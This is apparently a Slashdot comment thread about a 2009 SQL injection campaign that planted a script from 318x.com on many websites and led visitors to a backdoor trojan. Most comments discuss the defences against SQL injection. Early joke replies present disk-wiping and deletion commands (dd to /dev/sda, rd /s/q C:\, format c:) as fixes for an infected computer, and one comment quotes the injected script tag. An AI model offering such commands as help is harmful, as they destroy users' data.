SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."

hey

[Spazztastic]

Hey, I went to 318x.com and all of a sudden my computer is acting funny. Any suggestions?

Re:hey

[jo42]

dd if=/dev/zero of=/dev/sda bs=8192 will fix it.

Re:

[unformed]

dd: opening `/dev/sda` failed: Permission denied.

Re:

[unformed]

Ok thanks, trying it no

CARRIER DISCONNECT

Re:

[Pieroxy]

Yes, all that.

Re:hey

[Arancaytar]

I actually post all my comments via a dead-man's-switch proxy that logs my keystrokes in real time and submits the post once it detects inactivity. This way I can type things like Candlejack and still publish my po

Re:

[jbezorg]

Maybe he was dictating it.

Re:

[Anonymous Coward]

sudo !!

sudo dd if=/dev/zero of=/dev/sda bs=8192

Nope. Just says "Bad command or file name".

Re:

[Nerdfest]

Then you've already been pwned.

Re:

[Runaway1956]

Uhhhhmmmm - does deltree still exist on Windows? It's been a long time since I used it. Somewhere along the line, I called it, and it didn't exist. Windows ME? Windows XP? I don't remember, but it wasn't there. Try rd or rmdir instead. http://en.wikipedia.org/wiki/Deltree [wikipedia.org]

Re:

[shutdown -p now]

That one is outdated. What he needs is "rd /s/q C:\".

Re:

[Anonymous Coward]

"'dd' is not recognized as an internal or external command, operable program or batch file."

Still broken! =(

Posting AC so I don't get modded to hell by people who either don't think that was funny or are simply incapable of recognizing a joke.

Re:

[stfvon007]

on msdos / windows you have to enter:
echo format c: >dd.bat
before entering the dd command. It will work after that. :)

Re:

[secolactico]

You forgot to add the /autotest so it won't ask it for anything.

Re:

[HaeMaker]

The dude clearly doesn't run linux...

This is a system problem...

Delete c:\windows\system32

Didn't work.

[antdude]

C:\>dd if=/dev/zero of=/dev/sda bs=8192
'dd' is not recognized as an internal or external command,
operable program or batch file.

Now what? [grin]

Re:

[bev_tech_rob]

I am assuming that was a *nix command. The GP probably attempted command from a Windows box, which does not recognize that command and spews forth the quoted error...

Re:

[nneonneo]

I'm not sure what Cygwin does, exactly, but it manages to correctly spew out the first few sectors of my boot drive (including what looks like the MBR) when I do "dd if=/dev/sda", despite the fact that "ls /dev/" shows only fd, stdin, stdout and stderr.

So, with Cygwin installed, I can pwn myself with that command! Hurray!

Re:

[blair1q]

that's the point

it's not a security issue if you deliberately do something ignorant

like, say, using the internet

THE INTERNET IS NOT SECURE

says so right on the packaging, and always has

Re:

[element-o.p.]

My Internet didn't come with packaging. I used torrent to get it.

Re:hey

[Yvan256]

Call a comedy club and get your computer on stage?

Little Bobby Tables

[bmearns]

I blame Mrs. Roberts [xkcd.com].

318x.com

[NoYob]

I tried to go there and I got this from Google: Diagnostic page for 318x.com [google.com]

After doing a whois, I see that just about all information is described as "Unknown"

Why is this domain still in existence? Can ICANN take it down?

It looks like the sole reason for this domain is for malware.

Re:

[NeverVotedBush]

318x.com is now in my hosts file. Can at least try to protect ourselves...

Re:

[ls671]

318x.com zone is now defined in my DNS so I don't have to update host files on each and every one of my computers.

Just kidding, but host files are so 1980 ;-))

Re:

[Short Circuit]

I'm not familiar with any blemishes on ICANN's record of neutrality, but I, for one, wouldn't care to have my blog's domain erased because someone decided it was deemed harmful in some fashion.

why don't these go away?

[v1]

If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

Re:

[qazsedcft]

If it were kiddy porn it would be shutdown already.

Re:why don't these go away?

[jimicus]

You are assuming that all the systems are hosted at reputable hosting companies that pro-actively monitor all their systems.

There are millions of systems worldwide that are exposed to the public internet (even though they probably shouldn't be) that are sitting in the corner somewhere waiting for someone to "get around to decommissioning them" - and in the meantime they're pumping out spam and taking part in DDoS attacks.

No...

[Oxford_Comma_Lover]

The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.

Re:

[jimicus]

I think the sheer amount of shite in the form of worms, spam and DoS attacks continuing to flood the Internet kind of kills off that utopian vision, wouldn't you say?

Re:

[sjames]

Obviously, the suggestion is not implemented at all now.

Re:

[sjames]

The hosting company is irrelevant if the domain's NS records in the gtld-servers are pointed to nowhere. That won't help if the script uses the IP address, but in this case, it would kill it.

Where an IP address is used, null routing by an upstream provider can kill that IP. So the question stands, when the threat is this big, why is the site allowed to continue existing? Start at the colo provider/ISP and work up the chain until a reputable provider is found to null route the IP.

Re:

[amicusNYCL]

So the question stands, when the threat is this big, why is the site allowed to continue existing?

I don't know if you're bothering to test anything, but from where I stand 318x.com does not exist.

Re:

[wowbagger]

You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.

Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.

Even the hosting companies [softlayer.com] that claim [softlayer.com] to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites [softlayer.com], when confronted with multiple, on-going violations [winehq.org], will ignore all reports, remove all forum posts calling attenti

Re:

[v1]

Because linux sucks ass for games and is counterproductive to most users

and that's sooo important for those hosting web servers whose SQL is being hacked...

Re:

[Narcocide]

No you're wrong. People attack Windows because the most people use it AND it is conveniently also less inherently secure than anything else in current production. If everyone stopped using Windows and switched to XYZ then XYZ would eventually become the new biggest target, that is true but it is just as completely naive to assume the same percentage of attacks would be successful on an entirely different platform as Windows as it is to assume that you would have a remotely accurate clue about what that ne

Re:

[John Hasler]

And you really want ICANN to "yank" a domain just because somebody who claims to be a security expert says it contains "bad stuff"?

Reminds me of xkcd

[BountyX]

Seriously people stop naming your kids with ');DROP TABLE [xkcd.com] at the end...

Re:

[Ksevio]

Well that would be an SQL injection attack... Does everything that's been covered by XKCD remind you of it now?

Details?

[HangingChad]

I love the way they fail to mention what server systems might be effected. Is it SQL Server? MySQL? .NET? PHP? Windows servers? Linux? Both? What web sites are vulnerable?

It's always fun to snicker when you get to the registry entries which points to Windows. Although there was a trojan for Ubuntu in a desktop theme a few days ago, so enjoy the time to mock Windows users while it lasts.

Re:Details?

[Yvan256]

But a Trojan needs user access and approval to get installed. No OS on the planet can protect itself from a user with the admin password.

Re:Details?

[Bert64]

Windows 9x used to due a pretty good job, can't own a system once it's bluescreened.

Re:

[BlackSnake112]

Actually windows 9x did not have services, so there was less to hack into.

Re:

[caluml]

Linux + GRSec (or SELinux) can. Assuming they don't know the password/mechanism to enter the "unlocked" mode. There used to be a Gentoo SELinux box on the net - selinux.dev.gentoo.org, I think it was. They published the root password, and let you log in. It was funny to watch all the skiddies on there, copying their rootkits down. I wish I could have sent a wall to them all - "You're already root - stop that!".

Re:

[necrogram]

They didn't mention it because it doesn't matter. Its the result of bad coding practices. A sql injection attack is caused by the front end application accepting whatever input its given and using to generate the sql statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middle ware tear to handle database access, ie apache -> websphere -> database.

Re:

[Bengie]

paramerterized inputs?

The only times I EVER pass a value as a concatenated string is if it goes along these lines..

try
query = "select [columns] from table where iTableID = "+INT64.Parse(strInput).ToString();
catch

^^
My lazy code. I only do internal utilities on side projects, so I can get away with this since these utilities are seldom used by anyway except when crap goes wrong. My primary job is SQL.

otherwise it's always the

string strSelectQry = "Select [columns] from schooltable where ischoolguid = @ischool

Re:

[HangingChad]

They didn't mention it because it doesn't matter. Its the result of bad coding practices.

It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. Lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.

Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent e

Re:

[lseltzer]

If it's really over 100,000 sites with the same attack then there's something obvious they have in common, like the same PHP/MYSQL library, and it has a predictable vulnerability in it.

Re:Details?

[LordKaT]

Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?

On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?

The blog post is completely fucking useless.

Re:

[REggert]

according to TFA:

Malware description

Threatname: Backdoor.Win32.Buzus.croo

Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

Re:

[LordSnooty]

to repeat comments I made months ago... why don't these people agree on a common naming convention for new threats? 11 different names here!

Probably the Asprox botnet.

[lastchance_000]

I googled 318x.com and SQL injection and found this [whitefirdesign.com]. A little further searching revealed that Asprox has been ramping up activity recently [scmagazineus.com].

Re:

[jbezorg]

I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The ocassional coldfusion page also has me wondering.

From the first page of a google search for "<script src=http://318x.com></script>":

City of Iowa City<script src=http://318x.com></script> - How to ...
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
www.icg

How is SQL involved?

[Bromskloss]

The article said "SQL" in the headline, but never mentioned it again after that.

Re:

[jDeepbeep]

The article said "SQL" in the headline, but never mentioned it again after that.

My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

Re:

[gregarican]

The SQL injection allows the malware scripts to be placed on websites. Then website visitors get hit with the malware the scripts facilitate. Of course, silly me, I went and RTFA. Half of the headlines on /. are either grammatically incorrect, sensationalized, or just plain silly...

Re:

[LordKaT]

AFAIK there are two exploits:

On the users end there are several MS and Adobe scripting exploits being taken advantage of, all of which start inside the browser.

On the server end there is a SQL injection exploit being used to get the malicious code out there.

Re:

[Gary van der Merwe]

On the server end there is a SQL injection exploit being used to get the malicious code out there.

My point being that you don't need to do a SQL injection to do this.

To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.

To prevent a HTML+script injection, you need to change < to &lt;, > to &gt; & to &amp; etc. on input from the user that render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into at comment or some other user field. This has nothing to do with SQL.

Re:

[nigelo]

Mod parent up. The GP is way off the mark.

Re:

[cenc]

folder permissions.

The real problem

[Anonymous Coward]

So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:

Observed exploits include:

* Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
* MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
* Microsoft Office Web Components vulnerabilities described in MS09-043
* Microsoft video ActiveX vulnerability described in MS09-032

Re:

[wjsteele]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

This is actualy a stupid article, as it doensn't even bother to describe the platform which has the vulnerability in it. It's not a platform or database issue if it's a SQL Injection, so it must be some app that is common... like a CMS package or blog engine... something like that.

Bill

Re:

[gmuslera]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

In official packages of a linux distribution, i would say that almost all would be patched so shouldn't be affected. But we are talking about Windows world here. Im not sure how automatic are the updates for flash player (just today got one in my ubuntu box), Windows updates are known to add functionality (sometimes unwanted, so people could disable automatic updates after something "misbehaves"), and the MS fixes there probably arent for IE6 (still used by 20% of internet), maybe some for IE7 that is more

Re:

[element-o.p.]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

Are you certain? I believe Flash might still have issues [foregroundsecurity.com], unless Adobe has figured out something to contradict their earlier statement that "...unfortunately, there is no easy solution. This issue is very difficult to solve without also breaking existing, legitimate content elsewhere on the web." Still, that report was a month ago, so maybe the situation has changed since then. I couldn't find anything to confirm or deny that current versions of Flash are still vulnerable -- does anyone else k

Re:

[ToasterMonkey]

So the SQL injection which landed those vulnerabilities on 100+ thousand formerly trusted sites is not a real problem?

Obvious, but needs to be said

[GreenTom]

Add to windows\system32\drivers\etc\hosts:

127.0.0.1 318x.com

And you should be safe, for the moment.

Don't worry, that site is slashdotted.

[neo]

It's already under a huge DOS attack by the readers of Slashdot. There's no need to block it, in fact you should be attempting to load that page in concert with all the other members of the Slashbot.

Re:

[Nohea]

safe until next week, when they use another address.

Checking inputs is the only fix.

Let's say it all together now...

[gregarican]

validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...

Re:Oblig

[Monkeedude1212]

Exactly!

Obligatory [xkcd.com]

Re:Let's say it all together now...

[Vellmont]

validate your SQL inputs before posting them against an Internet-facing database.

Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.

Terrible article, inappropriate headline

[erroneus]

The source of the attacks are servers who have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.

132,000 hits on Google 132,000 infections

[shdragon]

I must disagree with the way they calculated infections. Counting the number of times something comes up on Google does not equal the number of infections.

Re:

[amicusNYCL]

If they search for the right string, then it should very closely approximate the number of compromised websites. The only other thing it should find are people talking about how to find the list of compromised websites.

132,000? Try 1269.

[milesw]

As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

http://google.com/safebrowsing/diagnostic?site=318x.com/

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxa

SQL injections? Are those for H1N1?

[fortapocalypse]

Oops. Send those SQL injections back. We don't need them.

"Claims 132,000+"???

[Limburgher]

That makes it sound like people died of SQL injection. . .

Block China ISP blocks.

[cenc]

These are again Chinese based servers.

http://google.com/safebrowsing/diagnostic?site=318x.com/ [google.com]

Re:

[cenc]

It looks like most of the sites showing up infected in Google are almost overwhelmingly in China or Chinese language.This one has been circulating for a while.

Is everybody at risk?

[Myopic]

I have one Mac laptop and one Linux laptop. Will the rootkit be a problem for me?

correction

[jDeepbeep]

Doesn't say what systems are affected by this SQL Injection.

All I can tell (from TFA), is it affects Windows

Fixed. Need coffee.

Re:Windoze

[TheNinjaroach]

All I can tell (from TFA), is it affects Windows servers.

SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.

Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

Re:

[jDeepbeep]

Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.

Re:

[danlip]

What really amazes me is how easy it is to avoid SQL injection attacks. You don't have to be a security genius. Use PreparedStatements in Java (or their equivalent in other languages). Problem solved.

Re:

[TheLink]

Only easy when using sane languages.

But it used to be very difficult to do the right thing with PHP.

The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.

See: http://php.net/manual/en/function.mysql-real-escape-string.php [php.net]

Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).

And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_re

Re:

[funaho]

The absolute worst I have encountered is Coldfusion, where you have to do insanely verbose crap like this:

<cfquery name="getId" datasource="somedb">
SELECT id
FROM users
WHERE login = <cfqueryparam value="#login#" type="cf_sql_varchar">
</cfquery>

Re:ColdFusion dynamic SQL interface

[butlerm]

Unless you have a driver that is seriously deficient, you can leave out the cfsqltype="cf_sql_varchar" part.

Many dynamic SQL interfaces are at least as verbose, due to the requirement to bind all the parameters. And good luck if you have to count question marks to get your parameter bindings in the right order, as in PHP, ODBC, JDBC etc.

Precompiler interfaces are the best, but who uses precompilers any more? Or you could just write as much as possible using stored procedures, but that has its own unique fo

Re:

[Arancaytar]

Argh. That is as if XML and SQL had a kid and it was ugly as fuck. :(

Re:

[TheLink]

If they introduced PDO earlier (and didn't create the aforementioned stupid stuff) you wouldn't have this problem.

As it is, lots of PHP hosting sites will either be prone to SQL injection, or prone to data corruption (or both), and be a pain to people (like you) trying to get things safe and working correctly.

The right way of doing things is: you filter inputs to your program so that your program can cope with the data, THEN your program has different filters for each output from your program to a different

Re:

[Runaway1956]

prepared statements. Damn it. I actually read that as "preparation H" the first time.

Now, I'm wondering if preparation H might be the right fix for a Windows machine......

Re:

[gregarican]

Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable betwen platforms? I did say "relatively" of course ::rollseyes::

Re:

[amicusNYCL]

Because of the interface between the server language and the database, not all SQL injection attacks will work on just any setup. The connection between PHP and MySQL, for example, will only execute a single query at a time. SQL Server, for example, will allow you to separate queries with a semicolon and send an entire batch.

Re:SQL injection portability

[butlerm]

For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.

Re:

[ralphdaugherty]

Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable betwen platforms? I did say "relatively" of course ::rollseyes::

Except when the attack depends on multi-statement lines separated by a : and a specific meta table to

Re:

[segedunum]

We don't know that. All we do know is that it needs a Windows client.

Re:

[asdf7890]

I wouldn't be happy with the in-place updates and lazy writing (http://blog.mongodb.org/post/248614779/fast-updates-with-mongodb-update-in-place) for anything of noticeable importance. Though for some tasks I'm sure the performance boost is worth the potential corruption suseptability this implies.

Re:

[Major Blud]

Mongo is document-oriented, not relational. You do realize that the two architectures serve completely different purposes right? I wouldn't bet that Mongo would be the right choice for a high-volume OLTP environment.

Re:

[DNX Blandy]

Very true, at which point this function simply doubled up the string delimiters, breaking the SQL injection. The major problem with Classic ASP was the casting of variables, if not done properly you were asking for it. If it's numeric, check it. .NET does not suffer from this problem unless the coder specifically passes a numeric value thou to an SQL statement as a string, which would be stupid. If everyone used stored procedures to deal with the SQL data, none of this would happen. My above checks alert yo

Re:

[shutdown -p now]

You don't need stored procedures, all you need are parametrized statements/commands, so long as your API provides it. And plain ADO, which was used with classic ASP, did provide parametrized commands.

Any attempt to defeat SQL injection by blacklisting syntax is inherently error-prone if only because it may break on a future version of database (when its syntax gets extended). Not to mention that, unless you have perfect knowledge of 100% of the SQL dialect that your implementation uses, you may forget to bl